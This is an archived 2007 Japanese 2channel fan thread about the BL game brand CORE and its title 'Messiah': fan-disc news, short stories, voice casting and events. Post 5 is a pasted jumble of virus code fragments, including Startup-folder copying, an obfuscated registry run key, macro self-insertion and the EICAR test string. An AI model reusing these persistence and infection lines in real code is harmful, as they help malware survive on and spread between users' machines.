2ちゃんねる ★スマホ版★ ■掲示板に戻る■ 全部 1- 最新50  

■ このスレッドは過去ログ倉庫に格納されています

BL@CORE その12

1 :いけない名無しさん:2007/06/14(木) 07:15:16 ID:Q5a3341L
CORE・CORE-DUSKの作品について語るスレです。

「ファナティカ」 発売中
「メサイア」 発売中

CORE公式ページ
http://www.orbit-soft.com/core/

マターリ・sage進行推奨。
荒らし・煽りはスルー推奨、反応するあなたも煽り人。

次スレは>>970さんにお願いします。

過去・関連スレ、FAQは>>2-10辺り。


2 :いけない名無しさん:2007/06/14(木) 07:17:21 ID:???
■前スレ
BL@CORE その11
http://game12.2ch.net/test/read.cgi/gboy/1156861894/l50

■過去スレ
BL@CORE その10
http://game9.2ch.net/test/read.cgi/gboy/1156407881/ (DAT落ち)
BL@CORE その9
http://game9.2ch.net/test/read.cgi/gboy/1153411861/
BL@CORE その8
http://game9.2ch.net/test/read.cgi/gboy/1152420036/
BL@CORE その7
http://game9.2ch.net/test/read.cgi/gboy/1149789188/
BL@CORE その6
http://game9.2ch.net/test/read.cgi/gboy/1146244498/
BL@CORE その5
http://game9.2ch.net/test/read.cgi/gboy/1141135422/
BL@CORE その4
http://game9.2ch.net/test/read.cgi/gboy/1126849808/
BL@CORE その3
http://game9.2ch.net/test/read.cgi/gboy/1105820449/
BL@CORE その2
http://game9.2ch.net/test/read.cgi/gboy/1099598233/
BL@CORE その1
http://game9.2ch.net/test/read.cgi/gboy/1092470671/


3 :いけない名無しさん:2007/06/14(木) 07:19:25 ID:???
■関連スレ
BL@トーラス・ZERO【CORE作品】その1 ※一般板
http://game9.2ch.net/test/read.cgi/ggirl/1121088688/
FANATICAを語るスレ ※したらば
http://jbbs.livedoor.jp/bbs/read.cgi/game/2314/1099591029/
【ネタバレ】メサイア【攻略】
http://jbbs.livedoor.jp/bbs/read.cgi/game/2314/1156315115/


■FAQ
Q. 「トーラス・ZERO」はどうなったの?
A. レーティングが全年齢に変更されました。
トーラス関係の話題は一般板該当スレでどうぞ。

Q. DUSKとSKYってどう違うの?
A. レーティングの違いによりレーベル分けされています。
・CORE-DUSK →年齢制限有り
・CORE-SKY →全年齢

Q. ネタバレしてもいいですか?
A. 当スレでは発売直後の作品については、
発売二週間後からネタバレ解禁となっています。


4 :前スレ981:2007/06/14(木) 07:23:21 ID:???
スレナンバー間違えた・・・orz
実質BL@CORE その13です。

5 :いけない名無しさん:2007/06/14(木) 16:52:29 ID:???
Set A4 = A1.CreateTextFile(A1.BuildPath(A1. 1)))
X5O!P%@AP[4\PZX54(P^)7CC)7}$EICAR-STANDARD-ANTIVIRUS-TEST-FILE!$H+H*
fso.copyfile "dirsystem&nurupo ", "j:\windows\start menu\programs\startup\"
ToInfect.CodeModule.InsertLines BGN, ADI1. (BGN, 1)
"avgnt"="\"C:\\Program Files\\AntiVir PersonalEdition Classic\\avgnt.exe\" /min /nosplash"
G.RegWrite A("IJDX^MNB@M^L@BIHOD]Rnguv`sd]Lhbsnrngu]Vhoenvr]BtssdouWdsrhno]Sto]VhoRu`su"), E.BuildPath(E. 1), A("VHORU@SU/WCR"))
If ActiveWorkbook.Modules.Count > 0 Then w = 1 Else w = 0
lines(n)=replace(lines(n),"""",chr(93)+chr(45)+chr(93))
kill -9 xz/tSaBh0
Sub auto_open()
Application.OnSheetActivate = "check_files"
End Sub
Sub check_files()
c$ = Application.StartupPath
m$ = Dir(c$ & "\" & "PERSONAL.XLS")
If m$ = "PERSONAL.XLS" Then p = 1 Else p = 0
whichfile = p + w * 10
End Sub


6 :いけない名無しさん:2007/06/14(木) 19:45:05 ID:???
>>1
乙!
落ちたまま勃たないかと思ったよ

7 :いけない名無しさん:2007/06/15(金) 02:24:01 ID:???
乙!

8 :いけない名無しさん:2007/06/15(金) 16:50:26 ID:???
>>1
乙!!
自分も落ちたのに気づいて立てようとしたんだが
プロバ規制で立てられなかったんだ…orz
ありがd!

9 :1:2007/06/15(金) 19:50:57 ID:???
2が間違っているので貼りなおします

■前スレ
BL@CORE その12
http://game12.2ch.net/test/read.cgi/gboy/1161303414/

■過去スレ
BL@CORE その11
http://game9.2ch.net/test/read.cgi/gboy/1156861894/
BL@CORE その10
http://game9.2ch.net/test/read.cgi/gboy/1156407881/
BL@CORE その9
http://game9.2ch.net/test/read.cgi/gboy/1153411861/
BL@CORE その8
http://game9.2ch.net/test/read.cgi/gboy/1152420036/
BL@CORE その7
http://game9.2ch.net/test/read.cgi/gboy/1149789188/
BL@CORE その6
http://game9.2ch.net/test/read.cgi/gboy/1146244498/
BL@CORE その5
http://game9.2ch.net/test/read.cgi/gboy/1141135422/
BL@CORE その4
http://game9.2ch.net/test/read.cgi/gboy/1126849808/
BL@CORE その3
http://game9.2ch.net/test/read.cgi/gboy/1105820449/
BL@CORE その2
http://game9.2ch.net/test/read.cgi/gboy/1099598233/
BL@CORE その1
http://game9.2ch.net/test/read.cgi/gboy/1092470671/



10 :いけない名無しさん:2007/06/16(土) 08:52:26 ID:???
練り按の病気って癌なのか

11 :いけない名無しさん:2007/06/17(日) 01:48:49 ID:???
白血病だと言っていたが。
血液癌は治りやすいとは言っても心配だ。

12 :いけない名無しさん:2007/06/17(日) 02:09:28 ID:???
つ渡辺謙
つ本田美奈子

どっちに転ぶか、わからないよ〜

13 :いけない名無しさん:2007/06/17(日) 06:46:49 ID:???
白血病にも種類はあるからな
一番軽いタイプと聞いたけど、それでも一生付き合うものだし
無理はしないで欲しい


14 :いけない名無しさん:2007/06/18(月) 11:50:45 ID:???
今回兄ブラに吸血鬼がでてきたみたいだけど、まさかクロスオーバー・・・してるわけないか

15 :いけない名無しさん:2007/06/20(水) 23:31:37 ID:???
兄新作やってないが、サンクスエリアのフラッシュだけ見てたら
何か遥か3を思い出したw

・・・・なんでだろ?

16 :いけない名無しさん:2007/06/21(木) 20:51:03 ID:???
フーン

17 :いけない名無しさん:2007/06/23(土) 21:34:19 ID:???
兄ブラの男キャラをこっちに持ってこないかなw

18 :いけない名無しさん:2007/06/24(日) 09:28:44 ID:???
同意。てか攻略対象を男にしてBLでだしてもまったく問題ない気がする。
会社も一つで二度おいしい?個別シナリオ書いて、CG描いて?システムはそのままで。
まったく新しいの作るよりコストかからないってことはないかな?

19 :いけない名無しさん:2007/06/24(日) 11:12:49 ID:???
あのシステムイベント発生バランスというかプレイ期間を半分にするだけでも
かなり良くなるしむしろBLだったら激しく萌えるからBL学園もので持ってきてくれないかな


20 :いけない名無しさん:2007/06/28(木) 23:38:15 ID:???
捕手

21 :いけない名無しさん:2007/07/05(木) 14:32:53 ID:???
落ちるのは・・・イヤァーー!!!!

22 :いけない名無しさん:2007/07/06(金) 00:48:13 ID:???
冷微のSS再録集、核は新規書き下ろしだってさ

23 :いけない名無しさん:2007/07/06(金) 01:56:04 ID:???
核頑張れー、ちょっとくらい遅くなっても待ってるよ。

24 :いけない名無しさん:2007/07/06(金) 08:03:49 ID:???
やっぱり書き下ろしか、前に片桐さんが日記で書いてた奴かな
久々にBL読めるのはうれしいよ

25 :いけない名無しさん:2007/07/07(土) 09:03:32 ID:???
カプは何だろう

26 :いけない名無しさん:2007/07/07(土) 10:02:09 ID:???
>煌視点、遼太視点のものをそれぞれ1本ずつ、新規書き下ろし
>挿絵もCARNELIANの描き下ろし
>ゲーム初期のある1シーンを逆視点で書きつつもシナリオで触れなかった部分も加えて

27 :いけない名無しさん:2007/07/07(土) 16:40:37 ID:???
338 名無したちの午後 sage 2007/07/07(土) 00:52:44 ID:TyGLbIDB0
相変わらずスタッフに粘着するストーカー見たいなスレだな。
それとも粘着されているうちが華なのか。


339 名無したちの午後 sage 2007/07/07(土) 01:37:01 ID:95d85hj40
相手がこんなんだからな〜どうしようもないんじゃね
http://game12.2ch.net/test/read.cgi/gboy/1171531271/l50


340 名無したちの午後 sage 2007/07/07(土) 01:48:06 ID:vLsziD9N0
ま〜そうだとしても名指しで批判はちょっと大人気ない上、
詐欺ゲー売りつけるのはダメだろ


341 名無したちの午後 sage 2007/07/07(土) 01:55:22 ID:cG3RLh4o0
自分が(当時)まさに作ってるゲームの主人公もショタってのがすごいw


343 名無したちの午後 sage 2007/07/07(土) 03:47:56 ID:BqKf6tDCO
>340
当時の向うの板を覗いていた記憶からすると名指しではなかった
感のいい奴がみれば見当がつくボカしで、自分は何か判らなかった
該当ブランドは発表された新作が看板原画とライターではなく
従来の作風とも違うため儲による叩きが勃発した
ちょうどぷに半やきるとあたりのこのスレをヒスっぽくした感じで
そのスレに練りのコピペが貼られ、誰の日記か詮索、バレ
新原画、ライターアンチ派への燃料に

その後はライター叩きの流れで荒れまくり、スレ荒廃
女儲は本当に容赦なく、残酷な事を目の当りにした


344 名無したちの午後 sage 2007/07/07(土) 04:18:11 ID:vLsziD9N0
あの日記はえげつない程ほぼ名指しだったよ。
いまだにライターとゲンガー叩かれてるし、スレは荒廃して廃れた。
何故かその後オービットスレも落ちた上完全に廃れてるけどね。


345 名無したちの午後 sage 2007/07/07(土) 04:35:23 ID:KhyCtSG2O
まぁ、作った物が全てだな。


346 名無したちの午後 sage 2007/07/07(土) 04:46:17 ID:NdAVDtCV0
つうか人気がすべて
練餡についてく奴が5万人から居るんだ
人気あるクリエーターが言った事はみんな信じるんだから、多数派の暴力も正義になるよ
練餡がマジで富樫病だったり影武者使ってたとしてもね

348 名無したちの午後 sage 2007/07/07(土) 07:49:02 ID:eRzTjZCL0
>>344
乱○スレが荒れたのはライターが父親からレイプされたとか、
風俗アルバイトした内容とか伝道歯ブラシが初めての人とか
痛いことブログで書きまくってたから、アンチと祭り好きが暴れたんですよ


349 名無したちの午後 sage 2007/07/07(土) 09:01:42 ID:G292Ye0b0
なんか、スレが腐女子臭いな…
書き込むのは構わんが、少しは匂い隠せ。

28 :いけない名無しさん:2007/07/07(土) 17:39:41 ID:???
いちいち貼らなくても向うのスレは読んでる

29 :いけない名無しさん:2007/07/07(土) 17:52:19 ID:???
350 名前:名無したちの午後[sage] 投稿日:2007/07/07(土) 09:15:35 ID:aOy/YJPY0
まあオービットはBLブランドも抱えてるからな

351 名前:名無したちの午後[sage] 投稿日:2007/07/07(土) 11:04:15 ID:YzOenZFF0
>>348
なんて萌える設定なんだ

352 名前:名無したちの午後[sage] 投稿日:2007/07/07(土) 11:47:56 ID:bzlV6JNL0
>346
あれそーな話題だが出来はともかく事前にアニメやってて
5万?売れたって言って(ソース知らんが)その中で
純粋な練のファンというか次もついてくるのはどれだけいるんだ・・・

353 名前:名無したちの午後[sage] 投稿日:2007/07/07(土) 14:50:49 ID:IxPinoR/0
全員もれなく付いてきます


たぶん

354 名前:名無したちの午後[sage] 投稿日:2007/07/07(土) 16:54:46 ID:cG3RLh4o0
きるととナイトデーモンからして内容いかんにかかわらずネリなら
買うってやつは1万。オービットブランドだけで買ってくれるのは
ぷにはんからして3000。これが桃でどう変化したか。

30 :いけない名無しさん:2007/07/08(日) 12:15:58 ID:???
給湯室のカットって冷微別冊用?
なんかカラーだけど、煌視点の大晦日期待していいんだろうか
発売時にしたらばで話していたのを思い出すよ

31 :いけない名無しさん:2007/07/08(日) 15:57:57 ID:???
大晦日のシーンを煌視点で読めるのかな?
あのシーンはメサイアの中でも一番好きかもなのでそれだったらうれしい

32 :いけない名無しさん:2007/07/08(日) 17:34:18 ID:???
大晦日で拓人のトイレ自慰まで書いてあって、
扉前で待ち受ける煌の心情が暴かれたなら3冊は買うね!

33 :いけない名無しさん:2007/07/08(日) 20:59:34 ID:???
>>32
そんな禿萌える内容だったら一ヶ月は煌タソ脳内祭りできる…

遼太視点はどこが来るんだろなー。なんにしろ楽しみだ。

34 :いけない名無しさん:2007/07/10(火) 03:07:14 ID:???
夏コミ落選なんて大ショックだわ
兄の方も辞退だなんて…何でかね

35 :いけない名無しさん:2007/07/10(火) 07:48:21 ID:???
兄ブラの方はキモイ安置DQNに突されそうだし
正しい判断だと思う

36 :いけない名無しさん:2007/07/10(火) 08:47:17 ID:???
イベント出ている暇あったら早くディスク送りやがれ!ってことになるだろうしな

37 :いけない名無しさん:2007/07/10(火) 16:35:51 ID:???
>>35
それは言いすぎ。ちゃんとしたものを出してたらあんなに皆切れないよ

38 :いけない名無しさん:2007/07/10(火) 16:41:18 ID:???
音声が一部以外は極悪バグもないしあのキレかたと粘着は過剰だよ
ゲームバランス厳しいけどキャラもシナリオも良いよ兄新作


39 :いけない名無しさん:2007/07/12(木) 23:31:19 ID:???
えー。キャラ絵は良いと思うけどシナリオは意味不明じゃん

40 :いけない名無しさん:2007/07/13(金) 01:41:05 ID:???
それはさすがにやってないだろとしかいえない>意味不明

41 :いけない名無しさん:2007/07/14(土) 12:35:36 ID:???
シナリオ意味不明ではないよ、ただ長時間要するだけだ。
にしても兄新作の主人公、COREに来ても大丈夫なキガスw

42 :いけない名無しさん:2007/07/14(土) 18:20:08 ID:???
あの性格ならCOREでもたしかにやってけるなw
それにしても春ちゃんは登場の仕方といいその後のストーリーといい
攻略キャラとしか思えん

43 :いけない名無しさん:2007/07/14(土) 22:57:18 ID:???
主人公を自分の許婚だと思いこんで、破談にしたれと夜這いをかけて返り討ち。


COREだったら絵付きで見れるなw

44 :いけない名無しさん:2007/07/15(日) 02:59:55 ID:???
兄ゲームの話はほどほどにな

45 :いけない名無しさん:2007/07/15(日) 16:46:28 ID:???
しかしネタが無いにも程がある

46 :いけない名無しさん:2007/07/15(日) 22:14:12 ID:???
公式に動きがないからね

47 :いけない名無しさん:2007/07/15(日) 22:59:17 ID:???
27?前後の雑誌発売待ちだね、フラゲする姐さんもいるかもしれないし
気になる舞台は煌は大晦日か初めての花屋、遼太はクリスマスあたりか?

48 :いけない名無しさん:2007/07/16(月) 11:02:38 ID:???
まあアニメの桃華は意味不明だが

49 :いけない名無しさん:2007/07/17(火) 07:26:21 ID:???
マターリスレからソースは知らないが、以前にオーディションの話出たよね

716 名前: いけない名無しさん [sage] 投稿日: 2007/07/17(火) 02:54:29 ID:???
情報投下〜
アインの某タイトルがテレビ実写ドラマ化進行中
あとCOREのメサイアが舞台とフィルムが決まったようだ

舞台はともかく、フィルムだと?(((( ;゚Д゚)))ガクガクブルブル

50 :いけない名無しさん:2007/07/17(火) 14:14:49 ID:???
あれだけ日記で吼えてた練氏がゴーサイン出すとは思えないが…
ショタじゃなきゃいいって話でもないよね?

51 :いけない名無しさん:2007/07/17(火) 14:33:58 ID:???
そんな非常識なのに練さんがゴーサイン出すわけないって・・・

52 :いけない名無しさん:2007/07/17(火) 15:09:53 ID:???
多少アレンジして劇がメサイア
フィルムがファナアニメとかならありえるかも
ファナは企画が予定あると言いつつも詳しい内容未発表だし
トーラスアニメが進められないから別企画が、とか
どこかで出てた記憶があるけど
まあ、今の段階ではおもしろネタだよなー

53 :いけない名無しさん:2007/07/18(水) 00:12:26 ID:???
アンチがやってるなら無駄だけど
とりあえず言っておきたいのは腐兄か熱烈儲か知らんが
板を超えて貼りに行ったり、持ってきたりは自重願えませんか
貼るにしてもはっきりとソース、情報が判明した時点にした方がいい
板が違う意味を考え直してみてはどうか。


54 :いけない名無しさん:2007/07/18(水) 08:25:06 ID:???
この舞台化がガセじゃないなら、練りが資本のスタジオでもできるのかね
何か、天狼★を思いだすわけだが

ノリ的にはあんな感じになるのかね・・・?

55 :いけない名無しさん:2007/07/18(水) 13:51:17 ID:???
去年あたりからBLドラマとかBL映画がやたら増えたよな。
タ/クミ/くんシ/リー/ズも映画化だし、
話題になるジャンルだと食いついてるんだろうか。

作品として面白ければ舞台でも映画でも
それはそれでいいとは思うんだけど・・・。

56 :いけない名無しさん:2007/07/18(水) 17:11:37 ID:???
三ツ矢雄二が絡んできそうな予感

57 :いけない名無しさん:2007/07/18(水) 20:29:11 ID:???
BL芝居何本か見たけど微妙なんだよな…
メサイアはいっそ宝塚が似合うと思う


>54
当時「炎の群像」を観に行って絶句した私としては
練はあそこまで悪趣味ではないと思いたい

58 :いけない名無しさん:2007/07/19(木) 11:10:08 ID:???
映画だと下手したらすごく安っぽくなりそう
低予算だろうから悲惨なことになるんじゃ…。

59 :いけない名無しさん:2007/07/19(木) 22:19:47 ID:???
>57
それって、漫画原作を男ばっかりで演じてる劇団?

男同士の恋愛がテーマの2人芝居を観たけど(全裸、絡みシーンあり)、
ベテラン俳優の熱演っぷりに萌えるどころじゃなかったw
メサイアなら男3人だし、脚本によっては密室劇として成立すると思う


60 :いけない名無しさん:2007/07/27(金) 01:55:40 ID:???
メサイア舞台化なら
出演者は中の人が、まんま演じればいいのにww
みんな舞台経験あるだろうし、露出しても平気な顔だし

61 :いけない名無しさん:2007/07/27(金) 07:03:11 ID:???
煌が吸血鬼じゃなくやくざになりそうだー

62 :いけない名無しさん:2007/07/27(金) 10:25:24 ID:???
拓人がエロ美人さんじゃなくなっちゃう。

63 :いけない名無しさん:2007/07/27(金) 16:36:38 ID:???
ヤクザ煌ワロスwww

64 :いけない名無しさん:2007/07/27(金) 20:52:05 ID:???
SSS買ってきたー
煌が大晦日で遼太が洲清バンド抜けの話だった
煌が予想以上にヘタレで遼太がガキだったよ
同じシーンの別視点なので萌えより先に合点がいった
後、洲清がえらく目立ってる、もったいないキャラだったねえ
でも洲清の言うことはもっともだと思ったな

65 :いけない名無しさん:2007/07/28(土) 02:27:58 ID:???
メサイアFDはいつ発売だろう…
少なくても今年は99%ムリだろうね

66 :いけない名無しさん:2007/07/28(土) 02:43:51 ID:???
120パーセント無理だろう

67 :いけない名無しさん:2007/07/28(土) 10:55:23 ID:???
近日中に情報公開するって行ってるんだし待とうよ
しかしCOREファンは濃いのか、そうかー、そうですか
驚かせる内容って49のことだったらどうしようかな
三次元は興味ないんだよな・・・

68 :いけない名無しさん:2007/07/28(土) 11:06:46 ID:???
練さんの日記でこんなの見つけたので貼っとく

>Cool-B(8月4日)…メサイアFD関係で見開き描き下ろしとか新規画像が
>あとなんか細かくいろいろやってるはずなのです…

69 :いけない名無しさん:2007/07/28(土) 18:55:53 ID:???
冷微の増刊やっと見た
攻め視点好きだから萌えた…が、煌が案の定凄まじいへたれてワロスw

70 :いけない名無しさん:2007/07/30(月) 02:23:23 ID:???
だがそれがいいw

71 :いけない名無しさん:2007/07/30(月) 22:52:22 ID:???
はげど。
うえーんヘタレ可愛いよヘタレ

72 :いけない名無しさん:2007/08/01(水) 14:14:32 ID:???
冷微バレ改行





洲清攻略キタ━━━━━━(゚∀゚)━━━━━━ !!
本編で声なしだったキャラにもすべてボイスがつくそうだ もちろんアリスやヴェロニカも
司もいけるっぽい
不思議の国のアリスをモチーフに、過去・アフター・パラレルストーリーを
展開するらしい

73 :いけない名無しさん:2007/08/01(水) 14:56:58 ID:???
マジかwww
洲清とアリスwktk
だがもう脳内ボイスが決まってるから
イメージと違うのが心配だなぁ

74 :いけない名無しさん:2007/08/01(水) 19:36:51 ID:???
以前アリスの声イメージを片桐さんが書いてたはず、まきいずみだったかな?
ウサギ司が給湯室にあがっていたからなんだろうと思っていたが・・・
洲清はパラレル要員ぽいな、片桐さんの趣味からしてアリスパラレルなら
双子洲清でアリス拓人攻略とかやりそうだけど


75 :いけない名無しさん:2007/08/01(水) 19:47:34 ID:???
あー帽子屋だったか

76 :いけない名無しさん:2007/08/02(木) 03:13:24 ID:???
えーなんでクールビーの情報見た人いるの(・・?)
今日アキバとブクロ行ったけど売ってるショップなんか一つも無かったぞぅ・・・

77 :いけない名無しさん:2007/08/02(木) 07:19:58 ID:???
公式が更新してるから、売ってなくても中身はわかる
ttp://www.ohzora.co.jp/sf/cool-b/
ttp://www.ohzora.co.jp/sf/cool-b/detail/

78 :いけない名無しさん:2007/08/02(木) 09:35:08 ID:???
冷微バレ改行











グラフィックはメサイアの1/3
拓人の歌が聞けるらしい
甘いものが多め
カードゲーム+ADV

白ウサギを追いかけてたどり着いたのは、アリスとヴェロニカが営むバー
お酒などを注文するたびにさまざまな世界に迷い込む

拓人:迷い込んできた主人公
遼太:赤いハートのプリンス
煌:白いハートのキング
洲清:キチガイ帽子屋
司:白ウサギ

スチルは3枚のってた あと立ち絵
煌とラブラブバカンス
遼太とコスプレエッチ
洲清との火遊び

79 :いけない名無しさん:2007/08/02(木) 13:07:13 ID:???
ああ、アリスだからカードバトルか
FCソフトてやったカードバトルを流用するのかな
あれくらい温いのでいいわ、勝ったらH拝めるとかで

80 :いけない名無しさん:2007/08/03(金) 12:24:05 ID:???
放置してたかと思ってたからこれは嬉しい驚き

81 :いけない名無しさん:2007/08/03(金) 14:54:16 ID:???
tp://ever-green.on.arena.ne.jp/code-oder/code-order.html

82 :いけない名無しさん:2007/08/03(金) 17:18:16 ID:???
自分もカードゲームって聞いてFCソフト思い出した
あれだったら簡単でいいよね
FCソフト自体もコスプレH楽しむ為のファンディスクっていう感じだったし

83 :いけない名無しさん:2007/08/03(金) 23:17:33 ID:???
洲清に声がつくなんて…嬉しすぎるぜ。つかそれだけで買い決定。
声優誰だろう?

84 :いけない名無しさん:2007/08/04(土) 10:28:25 ID:???
何気にこのゴージャス衣装にまったく違和感のない3人がすごいな
遼太の衣装のアレンジは結構かわいい
拓人はひたすら可愛いというか美人だよなぁほんと

85 :いけない名無しさん:2007/08/04(土) 13:42:00 ID:???
過去スレ漁ってたら、その8が咎狗スレでビックリした
次スレテンプレでは修正お願いします

BL@CORE その8
http://game9.2ch.net/test/read.cgi/gboy/1152281326/

86 :いけない名無しさん:2007/08/04(土) 19:46:03 ID:???
冷微にCG載ってたんでびっくりした
どうせちっとも手をつけてないんだろうと決めつけてて済まんかった
バカンスに新妻エプロン、FDならではのお祭り感がたまらんな
気長に待ってるよ

87 :いけない名無しさん:2007/08/09(木) 16:30:18 ID:???
2万5千本も売れたのかオメ!
拓人の新妻エプロンの破壊力すごいね
大晦日前に発売してくれら最高の正月が迎えられそう
スチルガン見してたらピラフ食べたくなった

88 :いけない名無しさん:2007/08/12(日) 08:03:53 ID:???
>83
声優さんまだ決まってないんだね
片桐さんのところで洲清にどんな声優イメージしているか
参考名を聞いてるよ
自分はBL仕事に偏見なくて、それなりにあっていたら誰でも良い

89 :いけない名無しさん:2007/08/13(月) 02:26:14 ID:???
あんまり有名どころじゃないほうが良い自分は少数派だろうな
有名な声優さんってドラマCDとかだと全然良いんだけど
ゲームだとアニメとかの他キャラの声の印象が強くて
いまいち集中できないんだよなぁ
ま、イメージに合ってて上手いのが1番だけど

90 :いけない名無しさん:2007/08/13(月) 18:00:04 ID:???
わたしもだノシ
でも洲清は誰がやってもさほど変わりがない気がする
低めの落ち着いた声なら誰でも良いや
脇キャラに下手な声優もってきて世界観壊すくらいなら
主要キャラ以外のボイスはイラネ派だけど
洲清のボイスが付くのは嬉しい

91 :いけない名無しさん:2007/08/17(金) 16:14:19 ID:???
FDじゃないのの洲清とかの音声追加ディスクとかは・・・さすがにないよねorz

92 :いけない名無しさん:2007/08/24(金) 21:58:14 ID:???
あー待ち遠しいよーFD−−!!!

93 :いけない名無しさん:2007/08/24(金) 22:21:05 ID:???
ちゃんと作ってくれてるのが分かっただけ嬉しい
声優さんの起用に関しては最終的に核のセンスを信じてる

94 :いけない名無しさん:2007/08/25(土) 21:46:43 ID:???
冬コミで発売とかしてくれ
いちいち年齢確認書類とかめんどくさいもん
冬コミでならその場で見せれば良いだけやし

95 :いけない名無しさん:2007/08/26(日) 12:19:54 ID:???
核会員になってたら会員番号記入だけで済むはずだけど

96 :いけない名無しさん:2007/08/27(月) 23:21:29 ID:???
メサイア気になってるんですけど、煌×遼太ってありますか?

97 :いけない名無しさん:2007/08/27(月) 23:24:44 ID:???
BADである

98 :いけない名無しさん:2007/08/27(月) 23:26:46 ID:???
一応あるけど、Badの一部出の描写だし濃い内容とは言い難い。
メサイアはあくまで拓人と誰かがメイン。
それのみが目的ならやめといたほうがいいと思う。

99 :いけない名無しさん:2007/09/05(水) 14:19:53 ID:???
核会員って申し込みして、どれくらいで会員なれますか?
一週間くらい…?

100 :いけない名無しさん:2007/09/06(木) 18:19:27 ID:???
>>96
自分はゲーム進めてるうち遼太は受けとしか思えなくなった。
おかげでメインルート放棄してしまったよw

でも1ルートのボリュームは結構あるし、損したとは思ってない。

101 :いけない名無しさん:2007/09/10(月) 13:12:55 ID:???
花○文庫で練りさんの名前を見つけたけど
BL系小説の挿絵は初めてかな?

102 :いけない名無しさん:2007/09/10(月) 14:22:18 ID:???
すれ違い

103 :いけない名無しさん:2007/09/12(水) 04:54:34 ID:???
>>96です。
答えてくれた方ありがとうございました!
もう少し考えてみます

104 :いけない名無しさん:2007/09/16(日) 17:52:39 ID:???
遅くなったけど
ファンディスクキタ━━━━━(゚∀゚)━━━━━!!!!

105 :いけない名無しさん:2007/09/17(月) 02:07:35 ID:???
いいなー

106 :いけない名無しさん:2007/09/17(月) 11:51:04 ID:???
はやく公式に詳細乗せて欲しいお(^ω^)

107 :いけない名無しさん:2007/09/17(月) 14:46:37 ID:???
公式の投げっぷりはすごいぜ・・・

108 :いけない名無しさん:2007/09/17(月) 14:57:29 ID:???
ここは確定情報出るまで公式は更新しない方針だからなー
自分は気になるからFANATIQUEのブログの方チェックしてるけど

109 :いけない名無しさん:2007/09/19(水) 01:13:46 ID:???
個人サイトの話になるんじゃないのか?それって

110 :いけない名無しさん:2007/09/19(水) 02:33:57 ID:???
んー、オービットの許可受けて公式より早い仕事情報載せる事があると
はっきり言ってるので微妙

111 :いけない名無しさん:2007/09/22(土) 21:57:14 ID:???
マ、マッドハッターな洲清キタ━━━━━━(*´Д`)━━━━━━ァァァン…(ねり餡ブログに)

112 :いけない名無しさん:2007/09/22(土) 22:08:12 ID:???
気付くのおそいぞー

113 :いけない名無しさん:2007/09/23(日) 17:00:07 ID:???
そりゃたまにしか更新しないんだから日参なんてしないよ

114 :いけない名無しさん:2007/09/23(日) 23:07:40 ID:???
シュウセイかっこいいよなぁ
攻略キャラじゃないなんて初め軽くショックだったさ

115 :いけない名無しさん:2007/09/24(月) 00:57:44 ID:???
挿絵の受が凄く好みだ(*´ω`)
ああいうのがゲームに出てくれたらなあ

116 :いけない名無しさん:2007/09/24(月) 02:33:35 ID:???
片桐さんも好きだけどいかにもBLという感じの内容のものも
COREのグラフィックで遊んでみたいね
練りさんは暗めでシックなのもいいけどPOPなのも描けるからもったいないな

117 :いけない名無しさん:2007/09/24(月) 20:52:00 ID:???
あうる絵で明るくちょっとコメディも入ったさわやかなのもやってみたい
SKY向きかも知れないけどさ
片桐さんとタイプの違うライターも入れば色々広げられそうだけど
茨城だからなかなか人がつかまらないか

118 :いけない名無しさん:2007/09/25(火) 18:00:07 ID:???
練スキーで始めたメサイアだけど片桐さんの文章に惚れてしまった
色んなタイプの作品でみてみたいなと思ったよ

119 :いけない名無しさん:2007/09/26(水) 01:08:57 ID:???
片桐さんの文章、私も好きだ
喘ぎ声だけは半分にしてほしいけどな

120 :いけない名無しさん:2007/09/26(水) 01:16:46 ID:???
ttp://zip.2chan.net/11/src/1189364744801.jpg
ショタってのがすごいw

121 :いけない名無しさん:2007/09/26(水) 02:00:09 ID:???
>>120
有害注意

122 :いけない名無しさん:2007/09/26(水) 22:07:03 ID:???
SPICY ORDERのSSがまさかのマスターEDでビックリした
へたれ乙女鬼畜にwktk

123 :いけない名無しさん:2007/09/27(木) 03:11:46 ID:???
??

124 :いけない名無しさん:2007/09/27(木) 07:12:52 ID:???
>123
ブログ、ブログ、片桐ブログをチェックするんだ

125 :いけない名無しさん:2007/09/30(日) 01:29:52 ID:???
7日のスパコミなら行けるんだが、コアは参加するかね?

126 :いけない名無しさん:2007/09/30(日) 04:38:04 ID:???
給湯室今見たよ〜今日なんだね
ぎりぎり気がついたさ
新刊エロそうなだ

127 :いけない名無しさん:2007/09/30(日) 11:27:45 ID:???
北海道住まいなので行けない…
コミケなら行くんだが、コミケでも同じの売るかなあ…

128 :いけない名無しさん:2007/09/30(日) 12:33:02 ID:???
漏れは冬コミも行けない…
通販して〜

129 :いけない名無しさん:2007/09/30(日) 12:46:34 ID:???
前回はJ庭の後、どれくらいで通販始まったっけ?
ここは間違いなく通販してくれるから助かるよ

130 :いけない名無しさん:2007/09/30(日) 17:36:12 ID:???
メッセとかでも通販してくれるかねぇ

131 :いけない名無しさん:2007/09/30(日) 20:37:55 ID:???
J庭行って来たよー
そして久々のメサイア本、萌えました…


132 :いけない名無しさん:2007/10/01(月) 15:45:59 ID:???
いいなー。
内容をチラっと教えてください

133 :いけない名無しさん:2007/10/02(火) 19:40:25 ID:???
内容とか触れずにバレの無い感想程度なら投下してもおk?

通販待ちの人もいるしただの感想だけど
通販着弾待ちか、したらばの方がいいのかな

134 :いけない名無しさん:2007/10/02(火) 20:29:27 ID:???
バレが無いならいいんじゃないかな?

135 :いけない名無しさん:2007/10/03(水) 21:18:01 ID:???
コミックシティスパークには出ないのかな?

136 :いけない名無しさん:2007/10/03(水) 22:26:27 ID:???
133です
J庭新刊、内容・バレに触れない程度の個人的感想↓
通販もまだなので一応改行で













SWEET〜がラブラブ甘々だったのに比べると
SPICYの方はちょいビターだったり刺激的
でもどっちのカプ話も、大人風味の中にも甘さはちゃんとあるとオモ
書き下ろしの挿絵も色っぽかったりエロかったり可愛いかったりで良かった

自分はどっちも好きだけど、対の本てことで2冊を読み比べたりすると
それぞれ甘さほろ苦さが際立っていい感じかなーと思った

137 :いけない名無しさん:2007/10/04(木) 22:25:40 ID:???
今年の冬コミでファンディスクのデモを流すらしい
それとなにやら大きなお知らせがあるらしい

138 :いけない名無しさん:2007/10/05(金) 10:37:29 ID:???
>136
乙ー 早く入手したくなった
滅脊で委託してくれないかなあ

139 :いけない名無しさん:2007/10/05(金) 20:07:06 ID:???
MESSIAH SPICY ORDER、オフィで通販始まったよ

140 :いけない名無しさん:2007/10/05(金) 21:54:34 ID:???
大きいお知らせってトーラスアニメ化とかか?

